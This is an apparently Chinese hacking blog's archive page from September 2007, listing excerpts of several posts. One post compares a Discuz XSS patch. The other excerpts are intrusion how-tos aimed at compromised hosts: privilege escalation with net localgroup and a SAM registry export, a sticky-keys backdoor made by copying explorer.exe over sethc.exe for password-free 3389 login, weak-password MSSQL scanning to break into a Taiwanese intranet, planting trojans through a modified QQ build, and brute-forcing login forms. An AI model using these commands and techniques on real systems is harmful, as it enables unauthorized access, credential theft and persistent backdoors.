2007年9月 的日志

Sql-injection In Xss[SIX]

BY [email protected]
2007-09-04
http://www.ph4nt0m.org

SIX存在的意义:
1、有权限限制的地方总是让人比较放心,比如后台、内网 …. 。而且有的程序官方否认后台漏洞的危险,比如*vbbs对以前那个数据备用得到shell的态度。的确,在权限的限制下,这样的漏洞很难直接被利用。 Xss就和上面的情况一样,也经常被程序员忽视,而且也不太好防,如果2个情况配合起来,那就意味着利用的难度将大大下降…
2、然后有的人会说xss攻击完全可以通过"劫持"cookie,直接继承权限:比如直接登陆后台。确实这是个好方法,但是有的后台现在都是直接和ip邦定。所以我们可以利用xss直接自动完成后台的一系列攻击如Sql-injection。
阅读全文 »

Tags: , ,

Dz0724补丁补掉的一个xss+补掉的另外一个xss

BY [email protected] 07/09/03

对比补丁我们发现在\include\discuzcode.func.php里:

$discuzcodes['searcharray']['bbcode_regexp'] = array( //标签的正则

"/\[align=([^\[\<]+?)\]/i",         ---->补丁前
"/\[float=([^\[\<]+?)\]/i"
|
V
"/\[align=(left|center|right)\]/i", ---->补丁后
[/align] "/\[float=(left|right)\]/i"
[/code]

阅读全文 »

Tags: ,

Feedburner被GFW,订阅本站的朋友请更新地址

  Feedburner被GFW了。也不知道Feedburner惹谁了,也不想骂了,有点麻木了,很无奈。
  以前通过feedburner订阅本站的朋友请更换订阅地址为: http://feed.huaidan.org/ 谢谢。
  现在只有抓虾受到影响,无法获取feedburner的更新,其他在线rss阅读器好像没有问题,我这里的Google Reader仍然可以获取feedburner的更新。而且我本地仍然可以直接访问 feeds.feedburner.com ,我本地网通,不过前几天用电信上网,无法访问 feeds.feedburner.com 。
  8月中旬的时候,家里附近的电缆坏了,连网也上不成,所以最近也没怎么上网,blog也没有及时更新,不过现 阅读全文 »

Tags: ,

巧用SU添加管理帐号

来源:b0r3d's Blog

今天朋友扔来一webshell让提权,SU默认密码没改,可执行命令,添加管理员后登陆,出现没有权限

估计是组策略设置了管理组没入终端登陆组,然后net localgroup "Remote Desktop Users" user /add

朋友说还不行,然后就准备reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg

然后修改administrator密码登陆,晕,竟然给禁用了,

net user administrator /active:yes 启用管理员帐号登陆

还是没有权限,看来真的是默认管理组没有终端登陆权限,或者设置了默认管理员的权限

阅读全文 »

Tags:

狂人DIY版2007b3爆洞 – 利用音乐场景随意种马

鬼仔注:作者发的时候没有发图。

作者:JiaJia [YuLv]
来源:JiaJia's Home

声明:本文已发表到2007.09期的《黑客手册》杂志上,转载请注明。

说明:该漏洞是由QQ2007b3狂人DIY版中的vbscript.dll文件所引起的,在原版的QQ2007b3下不存在这个问题。(在光盘中提供了补丁文件,如果您现在使用的是狂人DIY版覆盖原来的文件即可解决此问题。)

起因与发现:

在七月的某天深夜,我挂着QQ在写AntiARP-DNS(广告:它一个不错的防ARP攻击的绿色免费工具)的时候,突然莫名其妙的弹出一个对话框,内容大概是“深夜我入侵了你…… By XXX”,如图1。当时把我一愣,刹那间脸都黑了一半,脑子中浮现出一句话“啊!难道真的被人家当肉鸡给玩弄 阅读全文 »

Tags:

网站登陆接口的攻与防

来源:http://hi.baidu.com/breachme
作者:breach
发表于《黑客防线》2006年第十期

随着技术的成熟,现在的网站安全也随着提高了很多,但还是有不少有待提高的地方。对于网站,我一直以来都想写一个好的登陆接口,因为现在大部分的网站的登陆接口我真的不大满意,多多少少都存在一些漏洞――比如cookie欺骗、SQL注入、暴力破解等,尤其是暴力破解的防范方面,有些做得不够彻底。最近我终于有 了时间,所以就有了下文――本文只讨论暴力破解及单用户同时刻登陆次数这两个攻防问题。

攻:
暴力破解使用的是穷举大法。别看不起这个世界上最笨的方法,这个方法在没有办法的时候就是最好的办法!现在我就先写一个暴力破解程序(就用千寂孤城所介绍的XMLHTTP控件――简单嘛^.^),不过需 阅读全文 »

在台湾某内网穿行

作者:丢丢&&樱花浪子
来源:http://www.hacklu.net
申明:本文已发表黑客手册,转载请注名版权,此文版权归樱花浪子和黑客手册所有. !
转载请注明!

一、丢丢

  近月来微软的dns远程溢出漏洞是很火,运用起来作用非常强大,我们小菜可喜欢了,可惜破坏力越大,网管门越是当心,越是关注,补洞越快,可怜小菜我奋斗几天,只有搞到一只,唉,还是走老路吧,记得某位前辈说过,弱口令是永远补不了的漏洞。

  好,那就让我们一起开始1433弱口令利用的旅程吧。我用的工具是极速MSSQL弱口令扫描改进版,在扫出1433弱口令的同时还可以看出这个服务器的3389端口是否开了。使用和扫描过程就不说了,我怕挨板子,相信这些难不倒你们的。

经过我这任劳任怨,永不停机甚至可以称为用 阅读全文 »

Tags:

无需输入密码登陆3389

鬼仔注:附带TT写的一个bat,方便些。

来源:脚本安全小组

在肉鸡上执行命令

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

以后再连接肉鸡3389,敲5下shift键就可以直接进入了,无需输入密码,只是登陆上去没有任务栏,一直会有密码登陆框,不过够我们做很多事情了,目前win2003测试通过。

似乎2000也可以,XP不行。这两个系统没测试。

不知道有牛人知道是什么道理不.

小道消息:连敲5次shift就自动激活连滞键设置~~也就是自动执行sethc.exe 阅读全文 »

Tags: